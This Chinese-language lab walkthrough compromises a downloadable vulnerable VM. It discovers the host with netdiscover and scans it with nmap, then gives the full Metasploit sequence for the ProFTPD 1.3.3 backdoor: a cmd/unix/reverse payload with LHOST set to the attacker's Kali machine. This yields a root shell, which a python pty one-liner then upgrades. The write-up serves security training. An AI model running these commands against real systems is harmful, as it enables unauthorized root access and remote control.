一、信息收集
1.主机发现
靶机下载链接: https://pan.baidu.com/s/143q3cbZG6-8y8kMk51Lc_Q 提取码: i8hv
(1)Netdiscover:专用的二层发现工具,拥有主动和被动发现两种方式
具体操作如下,查看一下kali的ip
然后使用命令sudo netdiscover,发现了靶机的ip
2.端口扫描,服务识别
(1)使用nmap -A 开放的端口以及靶场操作系统和版本的探测,使用方法:nmap -A 192.168.101.106
二、后渗透
1.根据服务版本搜索相关漏洞
这里用到msfconsole,关于msfconsole介绍:msfconsole又叫MSF终端、The Mctasploit Framework,是目前Metasploit框架最流行的用户接口。
具体用法如下:
(1)在kali输入 msfconsole命令,进入到该框架内
(2)先看看可以利用的脚本,输入 search proftpd 1.3.3(为什么是proftpd 1.3.3,因为之前探测到是这个版本)
(3)由上图,我们进入利用的脚本,选择用序号2的那一个:use 2;然后查看要设置的参数(show options),使用方法如下:
(4)设置一下RHOSTS(目标的地址),输入set RHOSTS 192.168.101.106
(5)设置payload,输入set payload cmd/unix/reverse(反向连接)
(6)查看backdoor需要的参数:show options,发现还需要设置一个监听的地址
(7)设置LHOST:set LHOST 192.168.101.10(kali的ip)
(8)参数设置完成后,输入run,执行攻击,成功进入getshell
(9)查看当前用户拥有的权限:sudo -l,发现当前用户已经是root
优化命令执行终端,执行下面命令进入python交互式(注意要下载python环境才能运行):
python3 -c ‘import pty;pty.spawn(“/bin/bash”)’